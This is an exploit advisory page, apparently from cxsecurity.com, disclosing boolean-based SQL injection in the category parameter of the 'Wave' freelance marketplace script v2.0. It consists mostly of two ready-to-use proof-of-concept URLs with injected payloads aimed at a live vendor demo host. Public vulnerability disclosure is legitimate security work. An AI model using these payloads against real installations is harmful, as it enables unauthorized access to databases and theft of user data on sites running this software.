Wave - Powerful Freelance Marketplace System SQL Inj.

2019.12.30
tr Mehmet EMIROGLU (TR) tr
Risk: Medium
Local: Yes
Remote: Yes
CVE: N/A
CWE: N/A

=========================================================================================== # Exploit Title: Wave - Powerful Freelance Marketplace System SQL Inj. # Dork: N/A # Date: 29-12-2019 # Exploit Author: Mehmet EMIROGLU # Vendor Homepage: https://codecanyon.net/item/wave-powerful-freelance-marketplace-system/23782981 # Software Link: https://codecanyon.net/item/wave-powerful-freelance-marketplace-system/23782981 # Version: v2.0 # Category: Webapps # Tested on: Wamp64, Windows # CVE: N/A # Software Description: Build a great and successful Freelance Marketplace Business with this System. =========================================================================================== # POC - SQLi (Boolean Based) # Parameters : category # Attack Pattern : https://www.themashabrand.com/scripts/Wave/search_projects^token_id=9d319de926ac2d4078974e688621702081165e6e09f56035c869d8a9a8084a34& Design&category=99999999%27) oR 6841947=6841947 aNd (%276199%27)=(%276199 # POST Method : https://www.themashabrand.com/scripts/Wave/search_projects^token_id=9d319de926ac2d4078974e688621702081165e6e09f56035c869d8a9a8084a34& Design&category=99999999 =========================================================================================== ########################################################################################### =========================================================================================== # Exploit Title: Wave - Powerful Freelance Marketplace System SQL Inj. # Dork: N/A # Date: 29-12-2019 # Exploit Author: Mehmet EMIROGLU # Vendor Homepage: https://codecanyon.net/item/wave-powerful-freelance-marketplace-system/23782981 # Software Link: https://codecanyon.net/item/wave-powerful-freelance-marketplace-system/23782981 # Version: v2.0 # Category: Webapps # Tested on: Wamp64, Windows # CVE: N/A # Software Description: Build a great and successful Freelance Marketplace Business with this System. =========================================================================================== # POC - SQLi (Boolean Based) # Parameters : category # Attack Pattern : https://www.themashabrand.com/scripts/Wave/search_freelancers^token_id=9d319de926ac2d4078974e688621702081165e6e09f56035c869d8a9a8084a34& Design&category=%27 oR 7183593=7183593 aNd %27%25%27=%27 # POST Method : https://www.themashabrand.com/scripts/Wave/search_freelancers^token_id=9d319de926ac2d4078974e688621702081165e6e09f56035c869d8a9a8084a34& Design&category= ===========================================================================================


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top